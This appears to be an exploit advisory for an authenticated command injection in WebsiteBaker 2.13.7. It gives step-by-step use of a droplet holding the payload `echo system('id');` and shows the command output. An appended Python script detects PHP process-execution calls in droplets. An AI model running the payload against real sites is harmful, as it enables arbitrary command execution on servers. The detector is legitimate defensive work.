# Exploit Title: WebsiteBaker 2.13.7 r164 Command Injection Authenticated
# Exploit Author: tmrswrr /Hulya KARABAG
# Vendor Homepage: https://forum.websitebaker.org/
# Software Link: https://www.softaculous.com/apps/cms/WebsiteBaker
# Version : 2.13.7 r164
# Date: 2025/8/10

1. Log in with valid admin credentials.

2. Click Admin-Tools > droplets > RandomImage
   Navigate to: https://127.0.0.1/WebsiteBaker/admin/admintools/tool.php

3. Remove all code in Edit a Droplet and insert payload, save it :

   echo system('id');

4. Commandline to use:

   [[RandomImage?dir=subfolder_in_mediafolder]]

5. Go to modify page and add it :

   [[RandomImage?dir=subfolder_in_mediafolder]]

6. Open this page:
   Access: https://127.0.0.1/WebsiteBaker/pages/aaaaa.php

7. Verify Results

   uid=1003(WebsiteBaker) gid=1004(WebsiteBaker) groups=1004(WebsiteBaker)
   uid=1003(WebsiteBaker) gid=1004(WebsiteBaker) groups=1004(WebsiteBaker)
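
A defender-side check for the droplet abuse in the steps above, as an added example that is not part of the original advisory or of WebsiteBaker's code: it flags droplet bodies that call PHP process-execution functions or use the backtick operator. The `(name, code)` input shape, the function names `audit` and `audit_droplet`, and every sample droplet except the step 3 body are assumptions constructed for illustration.

```python
import re

# PHP functions that start an OS process. A droplet calling one runs commands
# as the web-server user whenever a page embedding [[DropletName]] is rendered.
EXEC_FUNCS = ("system", "exec", "passthru", "shell_exec", "popen", "proc_open", "pcntl_exec")

# Comments and string literals are blanked first so text inside them is not flagged.
_STRIP = re.compile(r"""
      /\*.*?\*/            # block comments
    | (?://|\#)[^\n]*      # line comments
    | '(?:\\.|[^'\\])*'    # single-quoted strings
    | "(?:\\.|[^"\\])*"    # double-quoted strings
    """, re.S | re.X)

# The lookbehind skips curl_exec(), $pdo->exec(), Foo::exec() and $exec().
_CALL = re.compile(r"(?<![\w$>:])(" + "|".join(EXEC_FUNCS) + r")\s*\(", re.I)


def _blank(match):
    # Keep an empty literal in place of a string so call syntax stays intact.
    return "''" if match.group(0)[0] in "'\"" else " "


def audit_droplet(code):
    """Return a sorted list of findings for one droplet's PHP source."""
    bare = _STRIP.sub(_blank, code)
    found = {m.group(1).lower() + "()" for m in _CALL.finditer(bare)}
    if "`" in bare:  # a backtick left outside strings is PHP's shell-exec operator
        found.add("backtick operator")
    return sorted(found)


def audit(droplets):
    """droplets: iterable of (name, code) pairs. Returns {name: findings} for flagged droplets."""
    return {name: f for name, code in droplets if (f := audit_droplet(code))}


# Constructed sample: the first body is the one from step 3, the rest are made up.
SAMPLE = [
    ("RandomImage", "echo system('id');"),
    ("Gallery", "$pdo->exec('DELETE FROM t'); // system('x')\nreturn curl_exec($ch);"),
    ("Legacy", "return `uptime`;"),
    ("Hint", "return 'call system(\"id\") is blocked';"),
]

if __name__ == "__main__":
    for name, findings in audit(SAMPLE).items():
        print(f"{name}: {', '.join(findings)}")
```

This is a pattern-based heuristic, not a PHP parser: it will miss calls made through variable function names or `eval`, so treat a clean result as a triage aid and still review who may edit droplets.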